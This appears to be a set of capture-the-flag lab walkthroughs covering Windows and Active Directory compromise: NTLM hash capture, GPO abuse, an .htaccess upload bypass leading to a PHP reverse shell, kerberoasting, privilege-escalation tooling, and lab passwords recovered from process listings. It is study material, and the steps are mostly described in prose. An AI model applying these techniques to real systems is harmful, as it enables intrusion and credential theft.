Shortly after, a connection was triggered, and I captured the NTLMv2 hash for the user anirudh
I cracked the captured hash and retrieved the password: SecureHM
With these credentials, I gained initial access via evil-winrm:
Manual methods.
You can also do this manually by creating a .url file that points to your attacker IP.
privilege escalation
Running whoami /priv showed that the user has SeBackupPrivilege. However, after some investigation, this turned out to be a rabbit hole.
I spent some time on it.
GPO Abuse via BloodHound
Using BloodHound, I discovered that the user anirudh has write permissions over the Default Domain Policy.
To escalate privileges, I took ownership of the GPO and modified the DACL using Impacket’s owneredit and dacledit. Then, I used SharpGPOAbuse.exe to add anirudh to the local Administrators group.
And give all privileges to the user.
The user anirudh is owner of default domain policy.
With Powerview, we can confirm the user has permissions on it.
Now, let’s modify the policy using SharpGPOAbuse.exe!
Now anirudh became administrator!
After successfully modifying the GPO, I forced a policy update.
gpupdate /force
With the policy applied, anirudh was added to the local Administrators group. I logged back in, verified my identity with whoami /groups, and successfully retrieved the root flag from the Administrator’s desktop.
Access
Initial foothold
Ports 80 and 443 are open. Let’s start by enumerating the web server.
Enumeration
WEB
I checked the versions of the web components, but no known vulnerabilities were found for these specific versions.
However, I confirmed that the site is running on an Apache server and is developed in PHP.
Observe functionality of the web.
I found a file upload function on the “Buy Tickets” page.
The upload filter can be easily bypassed by changing the extension to xxx.php.gif
However, neither a web shell nor a reverse shell would execute.
Exploitation
Since the target is an Apache server, we can upload a .htaccess file to manipulate server configurations.
For example, a file type can be added like below.
By adding this line, gif file extension will be treated as php file.
we can even create a new extension.
After uploading the crafted .htaccess file, it remains hidden in the uploads directory, but the configuration takes effect.
I uploaded a php revshell to the web site again, and this time managed to get a shell as svc_apache user.
Lateral movement
No local.txt flag in svc_apache users’ desktop folder.
Tried kerberoast using rubeus and found other credential.
Rubeus is highly effective for gathering credentials when you have initial access to a target system without cleartext passwords.
After cracking the captured hash, I obtained the password: trustno1
I used the RunsasCs to spawn a shell as the svc_mssql user.
Execute a reverse shell command as user svc_mssql
Privilege Escalation
Check svc_mssql’s priviliege.
The SeManageVolumePrivilege is a well-known privilege escalation vector.
Simply running the tool SeManageVolumeExploit, svc_mssql can access all resources like administrator.
For further information gathering, you may transfer sensitive files such as SAM, SYSTEM from system32 folder.
Nickel
Initial foothold
Nmap scan
The scan reveals several open ports, including FTP, SSH, SMB, and multiple HTTP services. I will begin by enumerating these services.
Enumeration
WEB
Accessing the web service on port 8089 reveals the following home page:
The page contains three buttons. Reviewing the source code shows that these links redirect to endpoints on port 33333.
- list-current-deployments
- list-running-procs
- list-active-nodes
I attempted to interact with the /list-active-nodes endpoint on port 33333 using curl:
The server responded with an HTTP 411 Length Required error. To resolve this, I added a Content-Length header and re-submitted the request:
The request was successful, returning a “Not Implemented” message. I proceeded to test the other endpoints.
While reviewing the running processes, I discovered a potential credential for SSH within a command line:
cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
SSH connection
Tm93aXNlU2xvb3BUaGVvcnkxMzkK is base64 decoded password.
Using these credentials, I successfully established an SSH connection as the user ariah:
Privesc
Upon checking the FTP directory, I found a PDF file. Since the file was password-protected, I used pdf2john to extract the hash and cracked it with john:
The PDF contains a note regarding three sites and mentions a command endpoint.
This endpoint allows command execution. I can access this locally via curl from my existing session or set up port forwarding to access it from my Kali machine.
Alternatively, using SSH port forwarding:
The output confirms the API is running as nt authority\system.
By sending a URL-encoded command, I can read the proof.txt file or execute a reverse shell payload to gain full system access.






























